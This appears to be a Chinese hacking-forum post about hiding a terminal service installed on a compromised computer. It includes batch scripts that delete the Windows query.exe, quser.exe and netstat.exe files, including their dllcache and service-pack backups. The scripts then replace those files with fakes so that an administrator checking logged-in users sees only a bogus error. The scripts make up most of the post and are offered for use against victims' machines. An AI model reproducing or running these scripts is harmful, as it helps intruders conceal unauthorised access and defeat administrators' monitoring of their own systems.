喂食猫

我的做法直接替换他的文件 query.exe
让他根本就不显示，用记事本做一个文件另存为exe

一个假的query.exe
不管我们用什么办法安装终端 怎么隐藏安装的痕迹
当管理员命令行运行query user的时候 一切就暴露了
将query.exe COPY 到肉机system32下 替换正版query.exe
这样 管理员运行query user 就会出现
[这个工具需要运行终端服务。]
将终端服务更好的隐藏起来


==========================

@echo off
@del c:\winn\system32\query.exe
@del c:\winnt\system32\dllcache\query.exe
@del c:\winn\system32\quser.exe
@del c:\winnt\system32\dllcache\quser.exe
@copy c:\winnt\query.exe c:\winnt\system32\query.exe
@copy c:\winnt\quser.exe c:\winnt\system32\quser.exe

批处理两个文件，如果对方没开终端可以用que.exe代替,装过终端的话用其它同名文件替换就可以了。但注意的是出现替换系统文件时按取消保留，然后确定替换！


@echo off
@del c:\winn\system32\query.exe
@del c:\winnt\system32\dllcache\query.exe
@del c:\winn\system32\quser.exe
@del c:\winnt\system32\dllcache\quser.exe
@copy c:\winnt\que.exe c:\winnt\system32\query.exe
@copy c:\winnt\que.exe c:\winnt\system32\quser.exe
==========
@echo off
@del c:\winn\system32\netstat.exe
@del c:\winnt\system32\dllcache\netstat.exe
@del C:\WINNT\ServicePackFiles\i386\netstat.exe
@copy c:\winnt\query.exe c:\winnt\system32\netstat.exe
帖子66 精华0 积分209 阅读权限40 在线时间46 小时 注册时间2006-1-19 最后登录2008-7-12 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

dingking
荣誉会员